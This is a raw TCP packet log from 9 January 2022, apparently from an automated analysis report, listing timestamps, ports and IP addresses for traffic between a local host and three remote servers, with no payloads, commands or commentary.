Jan 9, 2022 18:48:05.089987040 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.089988947 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.090070963 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.090200901 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.090266943 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.090307951 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.090321064 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.090344906 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.090399981 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.091087103 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091129065 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091166973 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091181040 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.091207027 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091255903 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.091891050 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091933966 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091972113 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.091984987 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092012882 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092053890 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092066050 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092092991 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092130899 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092143059 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092170954 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092210054 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092238903 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092251062 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092288971 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092318058 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092328072 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092367887 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092385054 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092405081 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092458010 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.092663050 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092703104 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.092751980 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152055979 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152126074 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152177095 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152179003 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152228117 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152281046 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152381897 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152441978 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152489901 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152492046 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152544022 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152596951 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152647972 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152708054 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152760983 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152791023 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152813911 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152865887 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152896881 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152947903 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.152997017 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.152997017 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153048992 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153095007 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153099060 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153151035 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153197050 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153198957 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153249979 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153299093 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153299093 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153347969 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153393984 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153397083 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153448105 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153493881 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153497934 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153548956 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153594971 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153594971 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153646946 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153690100 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153697014 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153745890 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153794050 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.153944969 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.153995991 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154042006 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154304981 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154372931 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154424906 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154432058 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154485941 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154536963 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154558897 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154588938 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154638052 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154671907 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154691935 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154742956 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154751062 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154792070 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154838085 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154840946 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154891968 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154941082 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.154944897 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.154994011 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.155044079 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214382887 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214448929 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214499950 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214507103 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214551926 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214602947 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214612961 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214656115 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214709044 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214709997 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214759111 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214812994 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214817047 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214869022 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214920044 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.214921951 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.214970112 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215019941 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215029955 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215070963 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215121984 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215150118 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215176105 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215224981 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215225935 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215277910 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215323925 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215326071 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215374947 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215425014 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215428114 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215476990 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215528011 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215536118 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.215576887 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215624094 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:05.215639114 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:05.264123917 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:08.669591904 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:08.845007896 CET	80	49808	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:08.845133066 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:08.845242023 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:08.845254898 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.020553112 CET	80	49808	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:09.401002884 CET	80	49808	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:09.403332949 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.403552055 CET	49808	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.439740896 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.578738928 CET	80	49808	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:09.619695902 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:09.620657921 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.620866060 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.620888948 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:09.800708055 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:09.801049948 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:10.034545898 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:10.035391092 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:10.035433054 CET	49807	8080	192.168.2.3	185.7.214.171
Jan 9, 2022 18:48:10.097852945 CET	8080	49807	185.7.214.171	192.168.2.3
Jan 9, 2022 18:48:10.191782951 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:10.191798925 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:10.192034960 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:10.192068100 CET	49809	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:10.371599913 CET	80	49809	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:11.504327059 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:11.680756092 CET	80	49815	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:11.680881977 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:11.680984020 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:11.683479071 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:11.857435942 CET	80	49815	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:11.859805107 CET	80	49815	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:12.231008053 CET	80	49815	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:12.231106043 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:12.240571022 CET	49815	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:12.298372030 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.298445940 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.298758030 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.299019098 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.299043894 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.350478888 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.350707054 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.352917910 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.352948904 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.353158951 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.355112076 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.396939993 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401235104 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401396036 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401487112 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401557922 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.401573896 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401596069 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401694059 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.401699066 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401719093 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401787996 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.401840925 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401916981 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.401962042 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.401988983 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402097940 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402163029 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402225971 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.402226925 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402254105 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402348995 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402406931 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402457952 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402533054 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.402637005 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402714968 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.402779102 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.402793884 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402884960 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402945042 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.402982950 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.402998924 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403045893 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403130054 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403167009 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403184891 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403244019 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403281927 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403285980 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403306961 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403397083 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403397083 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403420925 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403503895 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403562069 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403600931 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403615952 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403697014 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403757095 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403798103 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403780937 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403834105 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403866053 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403908968 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.403913975 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.403934956 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.404001951 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.404016018 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.404057980 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.404141903 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.404156923 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.417012930 CET	80	49815	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:12.419281960 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419380903 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419383049 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419428110 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419470072 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419524908 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419543982 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419585943 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419595957 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419646025 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419665098 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419703007 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419712067 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419790030 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419797897 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419817924 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419883966 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.419909954 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419981003 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.419996023 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420011997 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420053959 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420067072 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420100927 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420130968 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420145035 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420157909 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420191050 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420250893 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420265913 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420285940 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420326948 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420344114 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420356035 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420370102 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420429945 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420453072 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420464993 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420519114 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420526981 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420541048 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420605898 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.420609951 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420630932 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.420679092 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.437808037 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.437899113 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.437921047 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.437928915 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438007116 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438023090 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438041925 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438070059 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438111067 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438112020 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438133001 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438154936 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438172102 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438220024 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438267946 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438338041 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438358068 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438374043 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438397884 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438405991 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438417912 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438436985 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438513994 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438520908 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438544035 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438580990 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438594103 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438641071 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438642025 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438661098 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438738108 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438785076 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438800097 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438811064 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438832045 CET	443	49816	162.159.130.233	192.168.2.3
Jan 9, 2022 18:48:12.438904047 CET	49816	443	192.168.2.3	162.159.130.233
Jan 9, 2022 18:48:12.438910007 CET	443	49816	162.159.130.233	192.168.2.3
